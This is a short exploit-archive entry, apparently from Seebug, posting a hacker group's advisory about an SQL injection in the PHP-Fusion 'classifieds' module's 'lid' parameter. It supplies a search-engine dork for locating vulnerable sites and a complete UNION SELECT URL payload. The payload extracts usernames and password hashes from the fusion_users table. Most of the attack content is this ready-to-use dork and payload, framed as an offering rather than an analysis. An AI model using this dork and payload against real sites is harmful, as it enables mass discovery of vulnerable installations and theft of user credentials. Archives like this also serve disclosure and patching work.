PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability

2008-06-29T00:00:00
ID SSV:8868
Type seebug
Reporter Root
Modified 2008-06-29T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #################################
Php fusion \"classifieds\"  SQL-injetion  
#################################

++++++++++++++++++++++++++++
Author     :     boom3rang
contact     :    boomerang [at] knaqu-shqipe [dot] de
webpage  :  www.khg-crew.ws 
++++++++++++++++++++++++++++



----> Remote SQL Injection <------


[+] Dork:                     inurl:\"classifieds.php?op=detail_adverts\"


[+] Example:  www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]



exploit:
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--



##########################################
  greetz to:   All my albanian brothers
     =United State of Albania = 
##########################################